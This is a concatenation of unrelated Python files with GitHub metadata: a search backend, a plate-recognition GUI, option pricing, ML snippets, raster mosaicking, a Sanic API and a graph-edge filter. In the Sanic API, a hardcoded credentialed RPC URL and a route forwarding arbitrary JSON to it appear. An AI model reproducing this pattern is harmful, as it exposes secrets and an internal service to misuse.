limit (int, optional): how many results to generate. None means without limit.
Generates:
PartitionSearchResult instances.
"""
# SQLite FTS can't find terms with `-`, therefore all hyphens replaced with underscore before save.
# Now to make proper query we need to replace all hyphens in the search phrase.
# See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
search_phrase = search_phrase.replace('-', '_')
terms = SearchTermParser().parse(search_phrase)
from_year = terms.pop('from', None)
to_year = terms.pop('to', None)
query, query_params = self._make_query_from_terms(terms)
self._parsed_query = (query, query_params)
connection = self.backend.library.database.connection
connection.connection.create_function('rank', 1, _make_rank_func((1., .1, 0, 0)))
# SQLite FTS implementation does not allow to create indexes on FTS tables.
# see https://sqlite.org/fts3.html 1.5. Summary, p 1:
# ... it is not possible to create indices ...
#
# So, filter years range here.
results = connection.execute(query, query_params).fetchall()
for result in results:
vid, dataset_vid, score, db_from_year, db_to_year = result
if from_year and from_year < db_from_year:
continue
if to_year and to_year > db_to_year:
continue
yield PartitionSearchResult(
vid=vid, dataset_vid=dataset_vid, score=score)
def list_documents(self, limit=None):
""" Generates vids of all indexed partitions.
Args:
limit (int, optional): If not empty, the maximum number of results to return
Generates:
str: vid of the document.
"""
limit_str = ''
if limit:
try:
limit_str = 'LIMIT {}'.format(int(limit))
except (TypeError, ValueError):
pass
query = ('SELECT vid FROM partition_index ' + limit_str)
for row in self.backend.library.database.connection.execute(query).fetchall():
yield row['vid']
def _as_document(self, partition):
""" Converts partition to document indexed by to FTS index.
Args:
partition (orm.Partition): partition to convert.
Returns:
dict with structure matches to BasePartitionIndex._schema.
"""
doc = super(self.__class__, self)._as_document(partition)
# SQLite FTS can't find terms with `-`, replace it with underscore here and while searching.
# See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
doc['keywords'] = doc['keywords'].replace('-', '_')
doc['doc'] = doc['doc'].replace('-', '_')
doc['title'] = doc['title'].replace('-', '_')
# pass time_coverage to the _index_document.
doc['time_coverage'] = partition.time_coverage
return doc
def _make_query_from_terms(self, terms):
""" Creates a query for partition from decomposed search terms.
Args:
terms (dict or unicode or string):
Returns:
tuple of (str, dict): First element is str with FTS query, second is parameters of the query.
"""
match_query = ''
expanded_terms = self._expand_terms(terms)
if expanded_terms['doc']:
match_query = self.backend._and_join(expanded_terms['doc'])
if expanded_terms['keywords']:
if match_query:
match_query = self.backend._and_join(
[match_query, self.backend._join_keywords(expanded_terms['keywords'])])
else:
match_query = self.backend._join_keywords(expanded_terms['keywords'])
if match_query:
query = text("""
SELECT vid, dataset_vid, rank(matchinfo(partition_index)) AS score, from_year, to_year
FROM partition_index
WHERE partition_index MATCH :match_query
ORDER BY score DESC;
""")
query_params = {
'match_query': match_query}
else:
query = text("""
SELECT vid, dataset_vid, rank(matchinfo(partition_index)), from_year, to_year AS score
FROM partition_index""")
query_params = {}
return query, query_params
def _index_document(self, document, force=False):
""" Adds parition document to the index. """
from ambry.util import int_maybe
time_coverage = document.pop('time_coverage', [])
from_year = None
to_year = None
if time_coverage:
from_year = int_maybe(time_coverage[0])
to_year = int_maybe(time_coverage[-1])
query = text("""
INSERT INTO partition_index(vid, dataset_vid, title, keywords, doc, from_year, to_year)
VALUES(:vid, :dataset_vid, :title, :keywords, :doc, :from_year, :to_year); """)
self.backend.library.database.connection.execute(
query, from_year=from_year, to_year=to_year, **document)
def reset(self):
""" Drops index table. """
query = """
DROP TABLE partition_index;
"""
self.backend.library.database.connection.execute(query)
def _delete(self, vid=None):
""" Deletes partition with given vid from index.
Args:
vid (str): vid of the partition document to delete.
"""
query = text("""
DELETE FROM partition_index
WHERE vid = :vid;
""")
self.backend.library.database.connection.execute(query, vid=vid)
def is_indexed(self, partition):
""" Returns True if partition is already indexed. Otherwise returns False. """
query = text("""
SELECT vid
FROM partition_index
WHERE vid = :vid;
""")
result = self.backend.library.database.connection.execute(query, vid=partition.vid)
return bool(result.fetchall())
def all(self):
""" Returns list with vids of all indexed partitions. """
partitions = []
query = text("""
SELECT dataset_vid, vid
FROM partition_index;""")
for result in self.backend.library.database.connection.execute(query):
dataset_vid, vid = result
partitions.append(PartitionSearchResult(dataset_vid=dataset_vid, vid=vid, score=1))
return partitions
def _make_rank_func(weights):
def rank(matchinfo):
# matchinfo is defined as returning 32-bit unsigned integers
# in machine byte order
# http://www.sqlite.org/fts3.html#matchinfo
# and struct defaults to machine byte order
matchinfo = struct.unpack('I' * int(len(matchinfo) / 4), matchinfo)
it = iter(matchinfo[2:])
return sum(x[0] * w / x[1]
for x, w in zip(list(zip(it, it, it)), weights)
if x[1])
return rank
| CivicSpleen/ambry | ambry/library/search_backends/sqlite_backend.py | sqlite_backend.py | py | 20,150 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "ambry.util.get_logger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "ambry.library.search_backends.base.BaseSearchBackend",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "ambry.library.search_backends.base.BaseDatasetIndex",
"line_number... |
6240147202 | #
# SAKARYA ÜNİVERSİTESİ BİLGİSAYAR VE BİLİŞİM BİLİMLERİ FAKÜLTESİ
# BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ
# BİLGİSAYAR MÜHENDİSLİĞİ TASARIMI - 2. ÖĞRETİM P GRUBU
# EDA NUR KARAMUK - G181210061 & ELİF RUMEYSA AYDIN - G181210031
#
#
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtGui import QImage, QPixmap
import cv2, imutils
import sqlite3 as sql
import os
os.system('python Connection.py')
os.system('python CreateTable.py')
from PlateRecognitionAlgorithm import plateRecognize
from PlateRecords import Ui_SecondWindow
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1065, 594)
MainWindow.setAutoFillBackground(False)
MainWindow.setStyleSheet("background-color: rgb(226, 226, 226);")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("Icon/car.png"), QtGui.QIcon.Selected, QtGui.QIcon.On)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.plate_result = QtWidgets.QGroupBox(self.centralwidget)
self.plate_result.setGeometry(QtCore.QRect(550, 10, 481, 551))
font = QtGui.QFont()
font.setPointSize(12)
self.plate_result.setFont(font)
self.plate_result.setStyleSheet("background-color: rgb(235, 235, 235);")
self.plate_result.setObjectName("plate_result")
self.label_PlateResult = QtWidgets.QLabel(self.plate_result)
self.label_PlateResult.setGeometry(QtCore.QRect(10, 40, 461, 351))
self.label_PlateResult.setStyleSheet("background-color: rgb(200, 200, 200);")
self.label_PlateResult.setText("")
self.label_PlateResult.setAlignment(QtCore.Qt.AlignCenter)
self.label_PlateResult.setObjectName("label_PlateResult")
self.textPlateResult = QtWidgets.QTextEdit(self.plate_result)
self.textPlateResult.setGeometry(QtCore.QRect(10, 400, 271, 61))
font = QtGui.QFont()
font.setPointSize(16)
self.textPlateResult.setFont(font)
self.textPlateResult.setStyleSheet("background-color: rgb(255, 255, 255);")
self.textPlateResult.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.textPlateResult.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.textPlateResult.setReadOnly(True)
self.textPlateResult.setObjectName("textPlateResult")
self.textEdit = QtWidgets.QTextEdit(self.plate_result)
self.textEdit.setGeometry(QtCore.QRect(10, 480, 271, 51))
font = QtGui.QFont()
font.setPointSize(10)
self.textEdit.setFont(font)
self.textEdit.setReadOnly(True)
self.textEdit.setObjectName("textEdit")
self.btnCheckPlateNumber = QtWidgets.QPushButton(self.plate_result)
self.btnCheckPlateNumber.setGeometry(QtCore.QRect(290, 400, 181, 61))
font = QtGui.QFont()
font.setPointSize(11)
self.btnCheckPlateNumber.setFont(font)
self.btnCheckPlateNumber.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.btnCheckPlateNumber.setIconSize(QtCore.QSize(30, 30))
self.btnCheckPlateNumber.setObjectName("btnCheckPlateNumber")
self.btnShowPlateRecords = QtWidgets.QPushButton(self.plate_result)
self.btnShowPlateRecords.setGeometry(QtCore.QRect(290, 480, 181, 51))
font = QtGui.QFont()
font.setPointSize(11)
self.btnShowPlateRecords.setFont(font)
self.btnShowPlateRecords.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.btnShowPlateRecords.setIconSize(QtCore.QSize(30, 30))
self.btnShowPlateRecords.setObjectName("btnShowPlateRecords")
self.vehicle_plate = QtWidgets.QGroupBox(self.centralwidget)
self.vehicle_plate.setGeometry(QtCore.QRect(30, 10, 481, 551))
font = QtGui.QFont()
font.setPointSize(12)
self.vehicle_plate.setFont(font)
self.vehicle_plate.setStyleSheet("background-color: rgb(235, 235, 235);")
self.vehicle_plate.setObjectName("vehicle_plate")
self.startPlateRecognition = QtWidgets.QPushButton(self.vehicle_plate)
self.startPlateRecognition.setGeometry(QtCore.QRect(250, 430, 211, 51))
font = QtGui.QFont()
font.setPointSize(11)
self.startPlateRecognition.setFont(font)
self.startPlateRecognition.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.startPlateRecognition.setIconSize(QtCore.QSize(30, 30))
self.startPlateRecognition.setObjectName("startPlateRecognition")
self.labelVehicle = QtWidgets.QLabel(self.vehicle_plate)
self.labelVehicle.setGeometry(QtCore.QRect(10, 30, 461, 351))
self.labelVehicle.setStyleSheet("background-color: rgb(200, 200, 200);")
self.labelVehicle.setText("")
self.labelVehicle.setAlignment(QtCore.Qt.AlignCenter)
self.labelVehicle.setObjectName("labelVehicle")
self.openImageFile = QtWidgets.QPushButton(self.vehicle_plate)
self.openImageFile.setGeometry(QtCore.QRect(20, 430, 211, 51))
font = QtGui.QFont()
font.setPointSize(11)
self.openImageFile.setFont(font)
self.openImageFile.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.openImageFile.setIconSize(QtCore.QSize(30, 30))
self.openImageFile.setObjectName("openImageFile")
self.vehicle_plate.raise_()
self.plate_result.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.openImageFile.clicked.connect(self.loadImage)
self.startPlateRecognition.clicked.connect(self.showPlateRecognition)
self.btnShowPlateRecords.clicked.connect(self.openWindow)
self.btnCheckPlateNumber.clicked.connect(self.checkPlateNumber)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
imagePath = ""
def loadImage(self):
""" Bilgisayardan resim seçilmesini sağlayan fonksiyon.
"""
self.filename = QFileDialog.getOpenFileName(filter="Image (*.png *.xmp *.jpg *.jpeg *.webp)")[0]
self.image = cv2.imread(self.filename)
self.setPhoto(self.image)
global imagePath
imagePath = self.image
def setPhoto(self, image):
""" Label bileşeninde resmin yeniden boyutlandırıp gösterilmesini sağlayan fonksiyon.
"""
self.tmp = image
image = imutils.resize(image, width=500)
frame = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = QImage(frame, frame.shape[1], frame.shape[0], frame.strides[0], QImage.Format_RGB888)
self.labelVehicle.setPixmap(QtGui.QPixmap.fromImage(image))
# Plaka Okuma butonuna tıklandığında çalışan fonksiyon.
def showPlateRecognition(self):
self.writePlate(imagePath)
self.showPlateImage(imagePath)
# Plaka Okuma algoritmasında resmin sonuç label üzerinde gösterilmesini sağlayan fonksiyon.
def showPlateImage(self, image):
self.tmp = image
txt, krp = plateRecognize(image)
krp = imutils.resize(krp, width=350)
frame = cv2.cvtColor(krp, cv2.COLOR_BGR2RGB)
krp = QImage(frame, frame.shape[1], frame.shape[0], frame.strides[0], QImage.Format_RGB888)
self.label_PlateResult.setPixmap(QtGui.QPixmap.fromImage(krp))
# Plaka Okuma algoritmasında palaka metninin sonuç textBox'ın üzerinde gösterilmesini sağlayan fonksiyon.
def writePlate(self, image):
txt, krp = plateRecognize(image)
self.textPlateResult.setText(txt)
def openWindow(self):
self.window = QtWidgets.QMainWindow()
self.plateResult = self.textPlateResult.toPlainText()
self.ui = Ui_SecondWindow(self.plateResult)
self.ui.setupUi(self.window)
self.window.show()
def checkPlateNumber(self):
plateNumber = self.textPlateResult.toPlainText()
self.conn = sql.connect("Database/PlateRecognition.db")
self.c = self.conn.cursor()
self.c.execute("SELECT * FROM PlateNumberInformations WHERE plate_number = ?",(plateNumber,))
data = self.c.fetchall()
if len(data) == 0:
self.textEdit.setText("Araç kayıtlı değil.")
else:
self.textEdit.setText("Araç kayıtlı.")
self.conn.commit()
self.c.close()
self.conn.close()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Plaka Tanıma Sistemi"))
self.plate_result.setTitle(_translate("MainWindow", "Plaka Sonucu"))
self.btnCheckPlateNumber.setText(_translate("MainWindow", "Plakayı Kontrol Et"))
self.btnShowPlateRecords.setText(_translate("MainWindow", "Plaka Kayıtlarını Göster"))
self.vehicle_plate.setTitle(_translate("MainWindow", "Araç/Plaka Görseli"))
self.startPlateRecognition.setText(_translate("MainWindow", "Plaka Okuma Başlat"))
self.openImageFile.setText(_translate("MainWindow", "Resim Dosyası Seç"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| EdaNurKaramuk/PlakaTanimaSistemi | CarPlateRecognitionSystem.py | CarPlateRecognitionSystem.py | py | 9,785 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "os.system",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtGui.QIcon",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtGui",
"line_number"... |
37724851331 | # -*- coding: utf-8 -*-
import numpy as np
import math
import matplotlib.pyplot as plt
def option_pricing(s0, k, t, sigma, r, cp, american=False, n = 100):
#cijena call opcije u T CT = max(ST-K, 0)
#cijena put opcije u T PT = max(K-ST, 0)
#s0 - pocetna cijena
#k - strajk cijena
#t - datum dospjeca
#v - volatility - promjenjivost -sigma
#rf - risk-free rate
#cp 1/-1 call/put
#american True/False American/European
#n - broj koraka binomnog stabla
#b = B - money market account
#jarrow-rudd algoritam za binomial tree
#ovi parametri se racunaju na razne nacine u ovisnosti od koristenja algoritma
#(CRR, jarrow-rudd, Tian...)
delta_t = t/n
#p = 0.5
u = math.exp((r-0.5*math.pow(sigma,2))*delta_t+sigma*math.sqrt(delta_t))
d = math.exp((r-0.5*math.pow(sigma,2))*delta_t-sigma*math.sqrt(delta_t))
b = math.exp(r*delta_t)
q = (b - d)/(u-d) #q = p* - risk neutral measure
st = np.zeros((n+1, n+1))
option_value = np.zeros((n+1, n+1))
st[0, 0] = s0
am_price = []
eu_price = []
for i in range(1, n+1):
st[i, 0] = st[i-1, 0]*u
for j in range(1, i+1):
st[i, j] = st[i-1, j-1]*d
#rekurzija
for j in range(n+1):
option_value[n, j] = max(0, cp*(st[n, j]-k)) #stavljanje maks. vrijednosti na kraj
for i in range(n-1, -1, -1):
for j in range(i+1): #European option
option_value[i, j] = (q*option_value[i+1, j]+(1-q)*option_value[i+1, j+1])/b
if american: #American option
option_value[i, j] = max(option_value[i, j], cp*(st[i, j]-k))
am_price.append(option_value[i, j]) #samo za potrebe plotanja
else:
eu_price.append(option_value[i, j]) #samo za potrebe plotanja
#plotanje grafika
tam = np.linspace(0, 1, len(am_price))
plt.plot(tam, am_price, 'bo')
teu = np.linspace(0, 1, len(eu_price))
plt.plot(teu, eu_price, 'ro')
plt.show()
return option_value[0,0]
V = option_pricing(100, 80, 1, 0.8, 0.01, -1, False, 10)
#V = option_pricing(100, 80, 1, 0.8, 0.01, -1, True, 100)
print(V) | aldinabu/ou | option_pricing_dp.py | option_pricing_dp.py | py | 2,225 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "math.exp",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.pow",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.exp",
"line_number": 29,
"us... |
35015230469 | import importlib
from sklearn.cluster import SpectralClustering
import clusters_optimizer_base as co
importlib.reload(co)
class SpectralClusterOptimizer(co.ClustersOptimizerBase):
# 100 initializations
def optimize(self, data):
obj = SpectralClustering(
n_clusters=self.num_clusters,
assign_labels='discretize',
random_state=self.seed,
n_init=100,
)
obj.fit(data)
return obj.labels_
| morganstanley/MSML | papers/Clustering_via_Dual_Divergence_Maximization/spectral_clusters_optimizer.py | spectral_clusters_optimizer.py | py | 494 | python | en | code | 12 | github-code | 36 | [
{
"api_name": "importlib.reload",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "clusters_optimizer_base.ClustersOptimizerBase",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sklearn.cluster.SpectralClustering",
"line_number": 12,
"usage_type": "... |
24730881807 | from sklearn import tree
import numpy as np
X = np.array([[-1,-1],[-2,-1],[1,1],[2,1]])
y = np.array([1,1,2,2])
#
# X = [[0, 0], [1, 1]]
# Y = [0, 1]
clf = tree.DecisionTreeClassifier()
# clf = clf.fit(X, y)
clf = clf.fit(X, y)
print(clf)
print(clf.predict([[-0.8,-1]]))
print(clf.predict([[5,6]])) | 11city/tianchi | algorithm/DecisionTree/DecisionTreeTest.py | DecisionTreeTest.py | py | 304 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sklearn.tree.DecisionTreeClassifier",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sklearn.tre... |
506670450 | """
Merge, combine and mosaic
"""
def rsts_to_mosaic(inRasterS, o, api="grass", fformat='.tif', method=None):
"""
Create Mosaic of Raster
"""
if api == 'pygrass':
"""
The GRASS program r.patch allows the user to build a new raster map the size
and resolution of the current region by assigning known data values from
input raster maps to the cells in this region. This is done by filling in
"no data" cells, those that do not yet contain data, contain NULL data, or,
optionally contain 0 data, with the data from the first input map.
Once this is done the remaining holes are filled in by the next input map,
and so on. This program is useful for making a composite raster map layer
from two or more adjacent map layers, for filling in "holes" in a raster map
layer's data (e.g., in digital elevation data), or for updating an older map
layer with more recent data. The current geographic region definition and
mask settings are respected.
The first name listed in the string input=name,name,name, ... is the name of
the first map whose data values will be used to fill in "no data" cells in
the current region. The second through last input name maps will be used,
in order, to supply data values for for the remaining "no data" cells.
"""
from grass.pygrass.modules import Module
m = Module(
"r.patch", input=inRasterS, output=o,
overwrite=True, run_=False, quiet=True
)
m()
elif api == 'grass':
from glass.pys import execmd
rcmd = execmd((
f"r.patch input={','.join(inRasterS)} output={o} "
"--overwrite --quiet"
))
elif api == 'rasterio':
import rasterio
from rasterio.merge import merge
from glass.prop.df import drv_name
from glass.prop.prj import get_epsg, epsg_to_wkt
if type(inRasterS) != list:
from glass.pys.oss import lst_ff
rsts = lst_ff(inRasterS, file_format=fformat)
else: rsts = inRasterS
methods = ['first', 'last', 'min', 'max']
method = 'first' if not method or \
method not in methods else method
srcs = [rasterio.open(r) for r in rsts]
mosaic, out_trans = merge(srcs, method=method)
out_meta = srcs[0].meta.copy()
out_meta.update({
"driver" : drv_name(o),
"height" : mosaic.shape[1],
"width" : mosaic.shape[2],
"transform" : out_trans,
"count" : 1,
"crs" : epsg_to_wkt(get_epsg(rsts[0])),
"compress" : 'lzw'
})
with rasterio.open(o, "w", **out_meta) as dest:
dest.write(mosaic)
else:
raise ValueError(f'api {api} is not available')
return o
def rseries(lst, out, meth, as_cmd=None):
"""
r.series - Makes each output cell value a function of the values
assigned to the corresponding cells in the input raster map layers.
Method Options:
average, count, median, mode, minimum, min_raster, maximum,
max_raster, stddev, range, sum, variance, diversity,
slope, offset, detcoeff, tvalue, quart1, quart3, perc90,
quantile, skewness, kurtosis
"""
if type(lst) != list:
raise ValueError("lst must be a list of rasters")
if not as_cmd:
from grass.pygrass.modules import Module
serie = Module(
'r.series', input=lst, output=out, method=meth,
overwrite=True, quiet=True, run_=False
)
serie()
else:
from glass.pys import execmd
ilst = ",".join(lst)
rcmd = execmd((
f"r.series input={ilst} output={out} "
f"method={meth} "
"--overwrite --quiet"
))
return out
def fullgrass_rseries(ifolder, refrst, method, orst):
"""
R. Series using grass
"""
import os
from glass.wenv.grs import run_grass
from glass.pys.tm import now_as_str
from glass.pys.oss import lst_ff, fprop
loc = now_as_str()
gbase = run_grass(ifolder, location=loc, srs=refrst)
import grass.script.setup as gsetup
gsetup.init(gbase, ifolder, loc, "PERMANENT")
from glass.it.rst import rst_to_grs, grs_to_rst
rsts = [rst_to_grs(
r, fprop(r, 'fn')
) for r in lst_ff(ifolder, file_format='.tif')]
prst = rseries(rsts, fprop(orst, 'fn'), method, as_cmd=True)
grs_to_rst(prst, orst)
return orst
def bnds_to_mosaic(bands, outdata, ref_raster, loc=None):
"""
Satellite image To mosaic
bands = {
'bnd_2' : [path_to_file, path_to_file],
'bnd_3' : [path_to_file, path_to_file],
'bnd_4' : [path_to_file, path_to_file],
}
"""
"""
Start GRASS GIS Session
"""
import os
from glass.pys.oss import fprop
from glass.prop.prj import rst_epsg
from glass.wenv.grs import run_grass
# Get EPSG from refRaster
epsg = rst_epsg(ref_raster, returnIsProj=None)
LOC = loc if loc else 'gr_loc'
grass_base = run_grass(
outdata, grassBIN='grass78',
location=LOC, srs=epsg
)
import grass.script.setup as gsetup
gsetup.init(grass_base, outdata, LOC, 'PERMANENT')
# ************************************************************************ #
# GRASS MODULES #
# ************************************************************************ #
from glass.it.rst import rst_to_grs, grs_to_rst
from glass.wenv.grs import rst_to_region
# ************************************************************************ #
# SET GRASS GIS LOCATION EXTENT #
# ************************************************************************ #
extRst = rst_to_grs(ref_raster, 'extent_raster')
rst_to_region(extRst)
# ************************************************************************ #
# SEND DATA TO GRASS GIS #
# ************************************************************************ #
grs_bnds = {}
for bnd in bands:
l= []
for b in bands[bnd]:
bb = rst_to_grs(b, fprop(b, 'fn'))
l.append(bb)
grs_bnds[bnd] = l
# ************************************************************************ #
# PATCH bands and export #
# ************************************************************************ #
for bnd in grs_bnds:
mosaic_band = rseries(grs_bnds[bnd], bnd, 'maximum')
grs_bnds[bnd] = grs_to_rst(mosaic_band, os.path.join(
outdata, mosaic_band + '.tif'
), as_cmd=True)
return grs_bnds
| jasp382/glass | glass/rst/mos.py | mos.py | py | 6,840 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "grass.pygrass.modules.Module",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "glass.pys.execmd",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "glass.pys.oss.lst_ff",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "ra... |
17602594229 | from functools import wraps
import json
import os
import requests
import boto3
from sanic import Sanic, response
from sanic.exceptions import NotFound
from sanic.log import LOGGING_CONFIG_DEFAULTS
from sanic_cors import CORS
from sanic_limiter import Limiter, get_remote_address, RateLimitExceeded
from botocore.exceptions import ClientError
from sanic_prometheus import monitor
from erebor.errors import (error_response, UNAUTHORIZED,
INVALID_API_KEY,
RATE_LIMIT_EXCEEDED, ROUTE_NOT_FOUND)
from erebor.logs import logging_config
from erebor.sql import USER_ID_SQL
app = Sanic(log_config=logging_config
if not os.getenv('erebor_test') else LOGGING_CONFIG_DEFAULTS)
CORS(app, automatic_options=True)
limiter = Limiter(app,
global_limits=['50 per minute'],
key_func=get_remote_address)
def authorized():
def decorator(f):
@wraps(f)
async def decorated_function(request, *args, **kwargs):
db = request.app.pg
cookie = request.cookies.get('session_id')
if cookie:
user_ids = await db.fetchrow(USER_ID_SQL, cookie)
if user_ids is not None:
request['db'] = request.app.pg
request['session'] = {'user_id': user_ids['user_id'],
'user_uid': user_ids['user_uid'],
'channel': user_ids['channel'],
'session_id': cookie}
res = await f(request, *args, **kwargs)
return res
else:
error_response([INVALID_API_KEY])
return error_response([UNAUTHORIZED])
return decorated_function
return decorator
@app.exception(RateLimitExceeded)
def handle_429(request, exception):
return error_response([RATE_LIMIT_EXCEEDED])
@app.exception(NotFound)
def handle_404(request, exception):
return error_response([ROUTE_NOT_FOUND])
# REMOVE
@app.route('/jsonrpc', methods=['POST'])
@authorized()
async def json_rpc_bridge(request):
url = "http://hoard:bombadil@shenron.hoardinvest.com:8332"
headers = {'content-type': 'application/json'}
payload = request.json
rpc_response = requests.post(
url, data=json.dumps(payload), headers=headers)
return response.json(rpc_response.json())
def load_aws_secret(secret_name):
secret = None
endpoint_url = "https://secretsmanager.us-east-2.amazonaws.com"
region_name = "us-east-2"
session = boto3.session.Session()
client = session.client(
service_name='secretsmanager',
region_name=region_name,
endpoint_url=endpoint_url
)
try:
get_secret_value_response = client.get_secret_value(
SecretId=secret_name
)
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
print("The requested secret " + secret_name + " was not found")
elif e.response['Error']['Code'] == 'InvalidRequestException':
print("The request was invalid due to:", e)
elif e.response['Error']['Code'] == 'InvalidParameterException':
print("The request had invalid params:", e)
else:
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
return json.loads(secret)
if __name__ == '__main__':
    # .get() instead of os.environ[...]: a missing variable now reaches the
    # explicit "Missing database credentials" error below instead of dying
    # with a bare KeyError (which made the else branch unreachable).
    secret_name = os.environ.get('EREBOR_DB_AWS_SECRET')
    if secret_name:
        from erebor.db import db_bp
        secret = load_aws_secret(secret_name)
        # Connection settings consumed by the db blueprint.
        app.db = dict(database=secret['dbname'],
                      user=secret['username'],
                      password=secret['password'],
                      host=secret['host'],
                      port=secret['port'])
        app.blueprint(db_bp)
    else:
        raise Exception("Missing database credentials")
    from erebor.api.users import users_bp
    from erebor.api.transactions import transactions_bp
    from erebor.api.support import support_bp
    from erebor.api.misc import misc_bp
    from erebor.api.prices import prices_bp
    app.blueprint(users_bp)
    app.blueprint(transactions_bp)
    app.blueprint(support_bp)
    app.blueprint(misc_bp)
    app.blueprint(prices_bp)
    # Expose the monitoring endpoint before starting the server.
    monitor(app).expose_endpoint()
    # Access logging is disabled in production for throughput.
    app.run(host='0.0.0.0',
            port=8000,
            access_log=False if os.environ.get('EREBOR_ENV') == 'PROD'
            else True)
| MichaelHDesigns/erebor | erebor/erebor.py | erebor.py | py | 4,559 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sanic.Sanic",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "erebor.logs.logging_config",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "sanic.log.LOGGING_CO... |
35132638275 | import numpy as np
import gin.tf
@gin.configurable(whitelist=["use_entities_order"])
class ExistingEdgesFilter(object):
    """Filters scored candidate edges against the set of known graph edges.

    NOTE(review): this looks like the standard "filtered" evaluation setting
    for knowledge-graph link prediction — candidates that correspond to
    edges already present in the graph are removed so they cannot outrank
    the true answer.  Confirm against the callers.
    """
    def __init__(self, entities_count, graph_edges, use_entities_order=True):
        # entities_count: number of candidate entities tried at the masked slot.
        # graph_edges: iterable of edge id-tuples; stored as a set for O(1) lookup.
        self.entities_count = entities_count
        self.set_of_graph_edges = set(graph_edges)
        self.use_entities_order = use_entities_order
    def get_values_corresponding_to_existing_edges(self, edge_ids, mask_index, values):
        """Return (filtered_values, target_index) for one masked edge.

        edge_ids: the true edge; the entry at mask_index is the entity being
        predicted.  values: one score per candidate entity, aligned so that
        row i of the candidate matrix corresponds to entity id i.
        """
        # Entity id at the masked slot == row index of the true edge below.
        output_index = edge_ids[mask_index]
        # One candidate row per entity: copy the edge, then substitute every
        # possible entity id into the masked position.
        candidate_edges = np.tile(edge_ids, (self.entities_count, 1))
        candidate_edges[:, mask_index] = np.arange(self.entities_count, dtype=np.int32)
        if self.use_entities_order:
            # Keep candidates that are NOT existing edges, plus the true edge
            # itself.  (The comprehension variable `edge_ids` shadows the
            # parameter inside the comprehension only; Py3 scoping keeps the
            # parameter intact afterwards.)
            edges_to_keep_indexes = [
                index for index, edge_ids in enumerate(candidate_edges)
                if tuple(edge_ids) not in self.set_of_graph_edges or index == output_index
            ]
            filtered_edges = candidate_edges[edges_to_keep_indexes]
            # Locate the true edge's position within the filtered list.
            target_index = np.where((filtered_edges == edge_ids).all(axis=1))[0][0]
            return values[edges_to_keep_indexes], target_index
        # Unordered variant: keep non-existing candidates excluding the true
        # edge, append the true edge's value at the end ...
        edges_to_keep_indexes = [
            index for index, edge_ids in enumerate(candidate_edges)
            if tuple(edge_ids) not in self.set_of_graph_edges and index != output_index
        ]
        filtered_values = np.concatenate((values[edges_to_keep_indexes], [values[output_index]]))
        # ... then swap it to a random position so its location carries no
        # information.  target_index reports where it ended up.
        target_index = np.random.randint(len(filtered_values))
        filtered_values[-1], filtered_values[target_index] = filtered_values[target_index], filtered_values[-1]
        return filtered_values, target_index
| Dawidsoni/relation-embeddings | src/optimization/existing_edges_filter.py | existing_edges_filter.py | py | 1,625 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.tile",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.int32",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "numpy.where",
"line_numb... |
